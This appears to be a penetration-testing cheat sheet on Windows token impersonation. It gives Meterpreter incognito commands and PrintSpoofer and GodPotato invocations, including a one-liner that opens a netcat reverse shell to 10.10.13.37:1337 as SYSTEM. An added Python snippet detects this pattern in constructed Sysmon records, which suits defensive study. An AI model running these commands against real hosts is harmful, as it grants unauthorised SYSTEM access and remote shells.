Impersonate Token
Meterpreter Incognito
meterpreter > load incognito
# list all tokens
meterpreter > list_tokens -u
# impersonate a token (full DOMAIN\\user name; the backslash must be escaped)
meterpreter > impersonate_token <complete username>
SeImpersonatePrivilege
This Meterpreter guide will make your life easier:
https://hacker-mind.gitbook.io/hacker-mind/metasploit/meterpreter-tricks#manage-multi-session
whoami /priv
# look for SeImpersonatePrivilege
PrintSpoofer
Use this: https://github.com/itm4n/PrintSpoofer/releases/tag/v1.0
If you have an interactive shell, you can create a new SYSTEM process in your current console.
Use case: bind shell, reverse shell, psexec.py, etc.
.\PrintSpoofer64.exe -i -c cmd
or
If you can execute commands but you don't have an interactive shell, you can create a new SYSTEM process and exit immediately without interacting with it.
Use case: WinRM, WebShell, wmiexec.py, smbexec.py, etc.
.\PrintSpoofer64.exe -c "C:\Windows\Tasks\nc64.exe 10.10.13.37 1337 -e cmd"
GodPotato (latest one)
.\GodPotato-NET4.exe -cmd "cmd /c whoami"
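From the defender's side, the footprint all of the tools above leave is the same: a process running as NT AUTHORITY\SYSTEM whose parent ran as a low-privileged service account that holds SeImpersonatePrivilege. The following is an added example (not from this page or any of the tools it lists) that triages constructed Sysmon Event ID 1 records for that pattern; the field names follow Sysmon's ProcessCreate schema, while the log layout, sample records and the allow-list of legitimate SYSTEM parents are assumptions.

```python
# Added example: flag SYSTEM children spawned by a non-SYSTEM parent.
# Records are constructed "Key=Value | Key=Value" lines mimicking Sysmon Event ID 1.

# Parents that legitimately launch SYSTEM children on a default host (assumed allow-list).
LEGIT_SYSTEM_PARENTS = {
    r"c:\windows\system32\services.exe",
    r"c:\windows\system32\wininit.exe",
    r"c:\windows\system32\svchost.exe",
}
HIGH_PRIV = {r"nt authority\system"}


def parse_event(line: str) -> dict:
    """Parse one constructed 'Key=Value | ...' record into a dict."""
    return {k.strip(): v.strip() for k, v in (p.split("=", 1) for p in line.split(" | "))}


def is_suspicious(ev: dict) -> bool:
    """True when a SYSTEM process was created by a parent that was not SYSTEM
    and is not one of the known-good service launchers."""
    if ev.get("EventID") != "1":
        return False
    child = ev.get("User", "").lower()
    parent = ev.get("ParentUser", "").lower()
    parent_image = ev.get("ParentImage", "").lower()
    return child in HIGH_PRIV and parent not in HIGH_PRIV and parent_image not in LEGIT_SYSTEM_PARENTS


def find_token_abuse(lines):
    """Return (ParentUser, ParentImage, Image) for every suspicious record."""
    hits = []
    for line in lines:
        ev = parse_event(line)
        if is_suspicious(ev):
            hits.append((ev["ParentUser"], ev["ParentImage"], ev["Image"]))
    return hits


# Constructed sample records: one benign service start, one SYSTEM child spawned from
# a process running as an IIS application-pool identity, one benign IIS child, one non-1 event.
SAMPLE_EVENTS = [
    "EventID=1 | Image=C:\\Windows\\System32\\svchost.exe | User=NT AUTHORITY\\SYSTEM"
    " | ParentImage=C:\\Windows\\System32\\services.exe | ParentUser=NT AUTHORITY\\SYSTEM",
    "EventID=1 | Image=C:\\Windows\\System32\\cmd.exe | User=NT AUTHORITY\\SYSTEM"
    " | ParentImage=C:\\Windows\\Tasks\\PrintSpoofer64.exe | ParentUser=IIS APPPOOL\\DefaultAppPool",
    "EventID=1 | Image=C:\\Windows\\System32\\cmd.exe | User=IIS APPPOOL\\DefaultAppPool"
    " | ParentImage=C:\\Windows\\System32\\inetsrv\\w3wp.exe | ParentUser=IIS APPPOOL\\DefaultAppPool",
    "EventID=3 | Image=C:\\Windows\\System32\\svchost.exe | User=NT AUTHORITY\\NETWORK SERVICE",
]

if __name__ == "__main__":
    for hit in find_token_abuse(SAMPLE_EVENTS):
        print("suspicious SYSTEM child:", hit)
```

Only the record whose parent ran as the application-pool identity is reported; tune the allow-list to the host's real service launchers before using the rule in production.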

Other Privileges
Reference: https://github.com/daem0nc0re/PrivFu/tree/main/PrivilegedOperations